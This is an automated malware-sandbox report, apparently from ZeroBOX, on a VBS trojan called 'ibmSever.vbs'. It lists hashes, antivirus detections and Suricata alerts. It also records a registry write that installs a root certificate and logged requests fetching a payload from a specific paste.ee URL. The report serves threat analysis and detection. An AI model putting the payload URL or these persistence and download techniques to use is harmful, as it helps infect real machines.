Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
10.05 02:10
mime-attachment 2
10.05 11:10
66fffb908255c_nnxin.exe
10.05 11:10
66fe13d56fd43_EdgeOUpd...
10.05 11:10
9dd06d870941.exe#d15
10.05 11:10
7f3c2473d1e6.exe#sp_vid
10.05 11:10
f2e7fcb20146.exe#sp_sl
10.05 11:10
956d73b7f041.exe#defau...
10.05 09:10
payload.msi
10.05 09:10
fedf8679e8d2.exe#d12
10.05 09:10
segura.vbs

Latest News
10.05 04:10
Clone of TEST BLOG WIL...
10.05 03:10
Anzeige: So gelingt di...
10.05 03:10
KI verstehen mit Excel...
10.05 03:10
Apple Releases Critica...
10.05 02:10
Mechanical Switch Sci-...
10.05 11:10
This Bluetooth GATT Co...
10.05 09:10
Mac Malware with L0Pse...
10.05 09:10
타이거다즐러, 올리브영 온라인몰 입점… ...
10.05 09:10
Ben Horowitz Will Dona...
10.05 09:10
5G-Ausbau: Zwei Bundes...

Summary | ZeroBOX

ibmSever.vbs

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 26, 2024, 12:08 p.m.	Jan. 26, 2024, 12:12 p.m.

Size	160.4KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`bb9a31982bd53b29cc81e3027709727b`
SHA256	`d9c2a0240a8a4145728845cfeb9769f4906f1f825c1be919eee3303ba8d39404`
CRC32	`A675E416`
ssdeep	`3072:TjvNftRaeubmmwNmmyfC+smie4x49BTy3W4kUS3wuExYfyhRFcmJFIcNOb9j:Hlft4zWurrUSpE81`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ibmSever.vbs
184

Name	Response	Post-Analysis Lookup
paste.ee	A 104.21.84.67 A 172.67.187.200	104.21.84.67

IP Address	Status	Action
104.21.84.67	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 104.21.84.67:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
TCP 192.168.56.103:49162 -> 104.21.84.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49162 104.21.84.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=paste.ee	c2:b4:ac:5e:d6:d0:79:48:bd:61:49:ff:7a:f4:5f:ee:d4:45:1b:74

Performs some HTTP requests (2 events)

request	GET http://paste.ee/d/Kiio7
request	GET https://paste.ee/d/Kiio7

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.VBS.SAgent.gen
AVG	Script:SNH-gen [Trj]

Wscript.exe initiated network communications indicative of a script based payload download (4 events)

Time & API	Arguments	Status	Return	Repeated
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: GET /d/Kiio7 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee socket: 544		0	0
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: kge³"4GâÃkÎ@ÿª®Õûàîóé¤®ÏpN8<° ¹/5 ÀÀÀ À 28&ÿ paste.ee socket: 544		0	0
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: FBA3ÀìEÿÐÖêQØÖÜvm¯³·z-"@ÚpÌ#\í+/fø"Ñ-Ü¥áÀøó"Ý,%Ç¢@$0ÚÞ¾:rèD¶«³+daÖL¦ó4IL_øê]WJÄ§çâÚ¤$éY" socket: 544		0	0
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: °(·=<ÛöGaÿ{îÃ:ã²&{ÿHèDßÆèåÒEJ3òÚ§½çô8éÐ« .Aþ&±aLõ!5"Dd²";÷~Wj÷ÍÐÚÞa.ï:ÒÂS<Ô.÷IÞðËU¶vÓ¥æi~£b5 hê©©NË+ÙEU`}ÕTúÞr@jm¨.\|Á ³ªk2ÛyéÌ socket: 544		0	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (4 events)

Time & API	Arguments	Status	Return	Repeated
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: GET /d/Kiio7 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee socket: 544		0	0
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: kge³"4GâÃkÎ@ÿª®Õûàîóé¤®ÏpN8<° ¹/5 ÀÀÀ À 28&ÿ paste.ee socket: 544		0	0
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: FBA3ÀìEÿÐÖêQØÖÜvm¯³·z-"@ÚpÌ#\í+/fø"Ñ-Ü¥áÀøó"Ý,%Ç¢@$0ÚÞ¾:rèD¶«³+daÖL¦ó4IL_øê]WJÄ§çâÚ¤$éY" socket: 544		0	0
WSASend Jan. 26, 2024, 12:08 p.m.	buffer: °(·=<ÛöGaÿ{îÃ:ã²&{ÿHèDßÆèåÒEJ3òÚ§½çô8éÐ« .Aþ&±aLõ!5"Dd²";÷~Wj÷ÍÐÚÞa.ï:ÒÂS<Ô.÷IÞðËU¶vÓ¥æi~£b5 hê©©NË+ÙEU`}ÕTúÞr@jm¨.\|Á ³ªk2ÛyéÌ socket: 544		0	0